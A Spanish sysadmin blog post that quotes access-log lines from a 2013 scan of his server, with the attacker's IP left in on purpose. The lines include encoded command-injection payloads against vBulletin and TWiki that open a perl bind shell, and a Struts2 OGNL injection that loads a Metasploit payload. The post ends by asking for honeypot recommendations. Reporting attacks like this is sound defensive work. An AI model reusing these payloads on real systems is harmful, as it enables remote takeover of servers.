Escaneos curiosos

Últimamente estamos recibiendo algunos escaneos la mar de curiosos. A parte de los cientos de escaneos automáticos de siempre…Cada día recibimos mas mierda.


Lo curioso de esta vez es que… en vez de ir hacia alguno de los virtualhost tiraban contra la ip física de la maquina, que contesta una pagina estática diciendo que no hay nada que ver …

Empezaron con cosas como estas …

86.13.253.152 – – [19/Nov/2013:15:51:55 +0100] «GET /phpBB2/viewtopic.php?topic=9 HTTP/1.1» 404 481 «-» «Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)»
86.13.253.152 – – [19/Nov/2013:15:51:55 +0100] «GET /phpBB2/viewtopic.php?topic=8 HTTP/1.1» 404 481 «-» «Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)»
86.13.253.152 – – [19/Nov/2013:15:51:55 +0100] «GET /phpBB2/viewtopic.php?topic=7 HTTP/1.1» 404 481 «-» «Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)»
86.13.253.152 – – [19/Nov/2013:15:51:54 +0100] «GET /phpBB2/viewtopic.php?topic=6 HTTP/1.1» 404 481 «-» «Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)»

(ip del atacante dejada aposta …)

Luego empezo a intentar cosas como esta…

86.13.253.152 – – [19/Nov/2013:15:51:13 +0100] «GET /forum/misc.php?do=page&template=%7b%24%7bpassthru%28chr%28101%29.chr%2899%29.chr%28104%29.chr%28111%29.chr%2832%29.chr%28101%29.chr%2868%29.chr%2872%29.chr%2874%29.chr%28103%29.chr%2870%29.chr%2869%29.chr%28120%29.chr%28100%29.chr%28118%29.chr%28104%29.chr%2872%29.chr%2871%29.chr%2886%29.chr%2865%29.chr%28109%29.chr%28113%29.chr%2889%29.chr%2870%29.chr%2898%29.chr%2883%29.chr%2866%29.chr%2888%29.chr%2854%29.chr%28114%29.chr%2870%29.chr%2857%29.chr%2880%29.chr%2876%29.chr%2848%29.chr%28110%29.chr%28110%29.chr%2882%29.chr%28117%29.chr%28110%29.chr%28102%29.chr%28109%29.chr%2854%29.chr%28117%29.chr%2880%29.chr%2880%29.chr%2868%29.chr%2882%29.chr%2882%29.chr%28119%29.chr%2855%29.chr%2873%29.chr%28103%29.chr%2865%29.chr%2871%29.chr%28110%29.chr%2848%29.chr%28109%29.chr%2898%29.chr%2866%29.chr%28115%29.chr%2878%29.chr%2855%29.chr%2887%29.chr%2899%29.chr%28105%29.chr%2883%29.chr%2879%29.chr%28120%29.chr%2873%29.chr%2859%29.chr%28112%29.chr%28101%29.chr%28114%29.chr%28108%29.chr%2832%29.chr%2845%29.chr%2877%29.chr%2873%29.chr%2879%29.chr%2832%29.chr%2845%29.chr%28101%29.chr%2832%29.chr%2839%29.chr%2836%29.chr%28112%29.chr%2861%29.chr%28102%29.chr%28111%29.chr%28114%29.chr%28107%29.chr%2840%29

Supongo que estaria intentando explotar esto, o esto.

86.13.253.152 – – [19/Nov/2013:15:50:15 +0100] «GET /twiki/bin/view/Main/WebSearch?search=B8Go3W%27%3b/bin/echo%24%7bIFS%7d-ne%24%7bIFS%7d%27\\x70\\x65\\x72\\x6c\\x20\\x2d\\x4d\\x49\\x4f\\x20\\x2d\\x65\\x20\\x27\\x24\\x70\\x3d\\x66\\x6f\\x72\\x6b\\x28\\x29\\x3b\\x65\\x78\\x69\\x74\\x2c\\x69\\x66\\x24\\x70\\x3b\\x24\\x63\\x3d\\x6e\\x65\\x77\\x20\\x49\\x4f\\x3a\\x3a\\x53\\x6f\\x63\\x6b\\x65\\x74\\x3a\\x3a\\x49\\x4e\\x45\\x54\\x28\\x4c\\x6f\\x63\\x61\\x6c\\x50\\x6f\\x72\\x74\\x2c\\x34\\x37\\x35\\x34\\x2c\\x52\\x65\\x75\\x73\\x65\\x2c\\x31\\x2c\\x4c\\x69\\x73\\x74\\x65\\x6e\\x29\\x2d\\x3e\\x61\\x63\\x63\\x65\\x70\\x74\\x3b\\x24\\x7e\\x2d\\x3e\\x66\\x64\\x6f\\x70\\x65\\x6e\\x28\\x24\\x63\\x2c\\x77\\x29\\x3b\\x53\\x54\\x44\\x49\\x4e\\x2d\\x3e\\x66\\x64\\x6f\\x70\\x65\\x6e\\x28\\x24\\x63\\x2c\\x72\\x29\\x3b\\x73\\x79\\x73\\x74\\x65\\x6d\\x24\\x5f\\x20\\x77\\x68\\x69\\x6c\\x65\\x3c\\x3e\\x27%27%7csh%3b%23%27 HTTP/1.1» 404 490 «-» «Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)»

No se quedaba contento con darle caña a la pobre maquina .. así que seguía con cosas como esta…

86.13.253.152 – – [19/Nov/2013:16:01:47 +0100] «GET /blank-struts2/login.action?username=(#context[\»xwork.MethodAccessor.denyMethodExecution\»]=+new+java.lang.Boolean(false),#_memberAccess[\»allowStaticMethodAccess\»]=+new+java.lang.Boolean(true),%23q%3d%40java.lang.Class%40forName%28%27ognl.OgnlRuntime%27%29.getDeclaredField%28%27%5fjdkChecked%27%29%2c%23q.setAccessible%28true%29%2c%23q.set%28null%2ctrue%29%2c%23q%3d%40java.lang.Class%40forName%28%27ognl.OgnlRuntime%27%29.getDeclaredField%28%27%5fjdk15%27%29%2c%23q.setAccessible%28true%29%2c%23q.set%28null%2cfalse%29%2c%23cl%3dnew%20java.net.URLClassLoader%28new%20java.net.URL%5b%5d%7bnew%20java.io.File%28%27u2TTmr.jar%27%29.toURI%28%29.toURL%28%29%7d%29%2c%23c%3d%23cl.loadClass%28%27metasploit.Payload%27%29%2c%23c.getMethod%28%27main%27%2cnew%20java.lang.Class%5b%5d%7b%40java.lang.Class%40forName%28%27%5bLjava.lang.String%3b%27%29%7d%29.invoke%28null%2cnew%20java.lang.Object%5b%5d%7bnew%20java.lang.String%5b0%5d%7d%29)(‘meh’)&z[(username)(meh)]=true HTTP/1.1″ 404 487 «-» «Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)»

Atacando a struts (proyecto de apache para crear aplicaciones java).

Supongo que intentando explotar esto

El caso es que el tío estuvo unas cuantas horas probando cosas … y después se cansó y se fue a otro lado.

La putada de todo esto es que estaba liado haciendo cosas… y no paraban de llegarme correos al móvil del ossec..Xd. Una putada no haber tenido mas tiempo. Tengo que montar un honeypot …

Me recomendaron Glastopf. ¿Alguna otra recomendación?